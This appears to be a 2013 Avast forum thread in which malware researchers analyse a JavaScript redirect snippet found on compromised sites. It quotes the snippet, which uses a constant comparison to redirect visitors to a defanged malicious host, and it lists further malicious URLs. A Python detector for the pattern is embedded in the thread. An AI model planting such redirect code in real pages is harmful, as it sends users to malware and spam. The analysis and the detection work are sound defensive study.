Author Topic: Is this JS/Redir being detected?  (Read 4209 times)


Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31879
  • malware fighter
Is this JS/Redir being detected?
« on: January 16, 2013, 05:55:28 PM »
See: http://zulu.zscaler.com/submission/show/d2d0e1eafe344a5f4dc740e86d9c7e7a-1358354577
Detected via a file viewer was the following JS/Redir code
See code:
Code:
< script >
var1=49;
var2=var1;
if(var1==var2) {document.location="hxtp://dozakialko.ru:8080/forum/links/column.php";}
< / script >
Read on this:  http://blog.dynamoo.com/2013/01/american-express-spam-dozakialkoru.html (link post: Posted by Conrad Longmore)
Please wait a moment ... You will be forwarded.
Internet Explorer and Mozilla Firefox compatible only
See this report: http://wepawet.iseclab.org/view.php?hash=90855d4318147b4c3a78374383b0e147&type=js

reported to virus AT avast dot com

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2220
    • The WAR Against Malware
Re: Is this JS/Redir being detected?
« Reply #1 on: January 16, 2013, 06:53:16 PM »
Hi Polonus,

This technique is used with various URLs. A search on Google included:
Code:
hXtp://ukr.net
hXtp://topsearch10.com/search.php?aid=62756&q=home+jobs
hXtp://popka-super.ru
hXtp://realstarsearch.com/search.php?q=runescape+automine
hXtp://zaebiz.info
hXtp://global-advers.com/soft.php?aid=0153&d=2&product=XPA
hXtp://www.mp3sugar.com/?aff=2081
hXtp://evamendesochka.com/go.php?sid=9
hXtp://catalog--sites.info/sea
hXtp://yahhooo.info/search.php?q=ritalin&tpl=forbot

Do you see the pattern?
~!Donovan
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 36258
Re: Is this JS/Redir being detected?
« Reply #2 on: January 16, 2013, 09:36:51 PM »
“Ah beer. The cause of and the solution to all of life’s problems.”

"Operator! Give me the number for 911!"

Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31879
  • malware fighter
Re: Is this JS/Redir being detected?
« Reply #3 on: January 16, 2013, 10:10:05 PM »
Hi !Donovan,

Reported this and the malcode pattern to virus AT avast dot com. The file viewer analysis was clear enough to detect the "If var1 Equals var2 Then Redirect!" pattern. Another one here: htxp://cs.gamegarant.by/upload.htm
Thanks for the extended analysis on WAR: http://websiteanalystsresource.wordpress.com/2013/01/16/if-var1-equals-var2-then-redirect/ (link article author !Donovan),

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31879
  • malware fighter
Re: Is this JS/Redir being detected?
« Reply #4 on: January 17, 2013, 03:41:42 PM »
There are more variants on the same theme, see comparison operators in PHP: http://www.developphp.com/view_lesson.php?v=207 (link author: Adam Khoury), and the malcode could also be combined with particular escape characters and through malicious spacing code...

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
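
Added example, not posted by anyone in this thread: a small Python check for the "if var1 equals var2 then redirect" pattern discussed above, which tolerates the extra spacing, HTML entities and zero-width characters that variants may use. The function names, the regular expressions and the sample pages with their `redirect.example` host are assumptions made for this illustration.

```python
import html
import re

# Invisible characters sometimes inserted to split keywords (zero-width, soft hyphen).
INVISIBLE = dict.fromkeys(map(ord, "\u200b\u200c\u200d\u2060\ufeff\u00ad"))
# name = literal-or-name;   e.g. var1=49;  var2=var1;
ASSIGN = re.compile(r"\b(?:var\s+)?([A-Za-z_$][\w$]*)\s*=\s*([\w$]+)\s*;")
# if (a == b) { document.location = "url"   with arbitrary whitespace
GUARDED = re.compile(
    r"if\s*\(\s*([A-Za-z_$][\w$]*)\s*={2,3}\s*([A-Za-z_$][\w$]*)\s*\)\s*\{?\s*"
    r"(?:(?:window|document|top|self)\s*\.\s*)*location(?:\s*\.\s*href)?\s*=\s*"
    r"""(["'])(.+?)\3""",
    re.I | re.S,
)

def resolve(name, env, limit=8):
    """Follow alias chains such as var2=var1 down to the underlying literal."""
    while name in env and limit:
        name, limit = env[name], limit - 1
    return name

def find_constant_redirects(page):
    """Return redirect targets guarded by a comparison that is always true."""
    text = html.unescape(page).translate(INVISIBLE)
    hits = []
    for m in GUARDED.finditer(text):
        # Only assignments that appear before the guard can feed it.
        env = dict(ASSIGN.findall(text[:m.start()]))
        if resolve(m.group(1), env) == resolve(m.group(2), env):
            hits.append(m.group(4))
    return hits

# Constructed samples (placeholder hosts, not taken from the thread).
PLAIN = '<script>var1=49;var2=var1;if(var1==var2){document.location="http://redirect.example/a.php";}</script>'
SPACED = ("<script>\n a = 7 ;\n b  =  a ;\n if ( a &#61;&#61; b )\n {\n"
          "  window . location . href = 'http://redirect.example/b.php' ;\n }\n</script>")
BENIGN = '<script>var want="en";var lang=navigator.language;if(lang==want){document.location="/en/";}</script>'

if __name__ == "__main__":
    for label, sample in (("plain", PLAIN), ("spaced", SPACED), ("benign", BENIGN)):
        print(label, find_constant_redirects(sample))
```

The benign sample is not flagged because its comparison depends on a runtime value rather than on two names that resolve to the same literal. JavaScript string escapes inside the script are not decoded by this check.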

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2220
    • The WAR Against Malware
Re: Is this JS/Redir being detected?
« Reply #5 on: January 17, 2013, 05:59:53 PM »
Hi Polonus,

We have a topic from 2012 which includes similar malcode: http://forum.avast.com/index.php?topic=110553.0

~!Donovan
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31879
  • malware fighter
Re: Is this JS/Redir being detected?
« Reply #6 on: January 17, 2013, 09:03:39 PM »
Hi !Donovan,

Good you alerted us to that. Seems the JS/Redir variants have been with us since 2009. Those I reported in this thread appeared on VirusWatch Archives and then I just fed the URIs to redleg's fileviewer, as I later reported to virus AT avast dot com. In a NoScript protected browser JS/Redir stands out because permission is asked to go to the conditional redirect site, which of course we should not allow. The redirect is spam click related malcode...

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 36258
Re: Is this JS/Redir being detected?
« Reply #7 on: January 17, 2013, 09:12:14 PM »
The URL hhac.net/upload.htm is now down...

“Ah beer. The cause of and the solution to all of life’s problems.”

"Operator! Give me the number for 911!"